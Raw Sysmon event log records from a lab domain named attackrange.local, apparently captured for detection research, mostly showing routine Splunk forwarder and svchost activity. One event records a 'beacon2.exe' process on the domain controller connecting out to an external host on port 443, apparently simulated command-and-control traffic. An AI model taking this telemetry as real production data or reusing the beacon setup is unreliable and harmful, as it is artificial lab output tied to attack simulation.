12:24:06.341{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C20CE9FCDEEEC3BD9F670833EF81A7D4,SHA256=932D4FCE153557BBED4C1E4A9865B67747244B38324DE75722159A3E83A14219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440521Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:06.340{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83BC1A940C0774E7201F024A7BF90CAC,SHA256=B37C612289277EBEF5368DB80EB5685E2DD7104D955F3E4CCA34994BCD8B77D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440520Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:06.190{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440519Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:06.190{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440518Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:06.051{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=601B282E857CFE32348101B9979DCC8A,SHA256=9C9DCF404C7E9393B223D02A6B56AB3862F78E18A7CE0ED7266B6B4CAAFAB1D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291608Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:07.710{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC45BB9AB29058788063756C3A862361,SHA256=C6F6A8104A81B46971C3FD52305D2622B840BA107614C42286A7E915CD4C95C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440526Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:07.284{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD84D91EB612777B1EB493FF3FCA65A,SHA256=8B952B5C6B1F9635268775F2CCC1C5EE0C2C9D858C36D585D4780A326EF20846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291607Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:07.124{BEA10069-D13E-6086-9900-00000000BB01}408NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440525Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:07.191{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440524Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:07.191{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440531Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:05.438{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local51675- 23542300x8000000000000000440530Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:08.321{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A78485047EF82DC9A675DD643029B6,SHA256=708CF92286B3E508B809E5B74049CCCB7C3906FBDA82D71FED3ACCEF35443DE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291611Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:08.712{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FE850FDC43D71F811819F476A31E93F,SHA256=4B3129809B31E7517D1923C145D15AE54A7608DD9A41C374DC1DD9058C87351F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291610Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:06.405{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50623-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000291609Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:08.111{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E3409AA61789C0D1A5F79D3353B2D3D,SHA256=CD51F603BD00EC9D58583930F210629AA1E982DA8B48DDA5937AAF9DE95F1AEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440529Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:08.192{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440528Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:08.192{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440527Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:08.045{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C20CE9FCDEEEC3BD9F670833EF81A7D4,SHA256=932D4FCE153557BBED4C1E4A9865B67747244B38324DE75722159A3E83A14219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291614Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:09.714{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E2ACA69263AD1FE6532D27A7706582,SHA256=A0E6928A68A0F58D460E39310E150C50E5472AD723E80D00D80D7CDDBAB85688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440534Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:09.512{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F5832977B76211E1D77F4B880C5A41,SHA256=2AC37F1ECE2F012365752D745FFC1AC4C6034E056A9768CCF3D2A414FACE79D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440533Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:09.193{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440532Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:09.193{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291613Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:07.470{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50624-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291612Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:09.175{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EBAF1724B88BE2DF0D5A2001CD4C33,SHA256=4C7EB9E7862DF72440FEB54E345DA93D220F483DB742A58932CE2C1C11289398,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440539Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:07.689{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-932.attackrange.local62409-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000440538Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:10.526{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F4FFB893801E0DFADBC0ACB474A31E,SHA256=DFA4F3263BD37DB4FF13803F17EA99B037E5964FC03440E411CB13D308ED6EAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291615Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:10.747{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0324B796D73BCD40BED822E4B37C8EC,SHA256=E88162080DDD04BE7E838680CC4CEE93B2C3CF0A43330ADC7EC67C66A798B356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440537Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:10.456{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCB3B803D643A29F78CC0B1C4F500ACE,SHA256=3A9C1B9A33314C6F3B60F0DD5FFFAFE05C5B2B565863C362FB1188C5DE30462B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440536Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:10.194{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440535Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:10.194{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291616Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:11.780{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83ECFAB07AD90C344844FA19128D28D,SHA256=BD0CD2E3C85B206D4D185BD233871D65863ADB2A098551E832B364708BB86971,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440543Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:08.695{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62410-false10.0.1.12-8000- 23542300x8000000000000000440542Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:11.556{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CED2B67AFBEFFF580DCB4720969E9C98,SHA256=1C8B65E4CB12F629959237CCC4EB36E2B68B01527892BFBD5E06450D9DF20FBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440541Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:11.195{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440540Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:11.195{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291617Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:12.782{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C225BF364A6AF3B7A832309CFACDF685,SHA256=F8162E9FEF9E5C6D36EFE7EDFB27C434E7F92AF41217512A2D3AEEAD69DCCC33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440546Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:12.564{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47EA1EED8F611C8B702A23A2EC26C9DA,SHA256=1BF81F42A7E676BE0D2EE5B739725208A2A1684E96FD3DA89D05A936F5838D38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440545Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:12.196{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440544Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:12.196{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440549Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:13.784{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F6C6821BE21E9E1A09AC4BC669E316E,SHA256=6241A36802574475649A732AA31563094279408088463A41ED51821263E67E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291618Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:13.784{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9C3C6B4AA4C80D511383C700FA1CED8,SHA256=433530E3F07A5EFEB9F681CED3771F283BD6C337A53E1731EA1432D2EF3E34E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440548Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:13.197{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440547Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:13.197{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291620Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:14.870{BEA10069-D0C2-6086-1300-00000000BB01}344NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=85EEE33954FD4D74709D4192AE74FF69,SHA256=F7AB05092A1723D333152D45087FE26DEBFF1DB96C1019588C0EBF8ECAEE6C76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291619Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:14.786{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 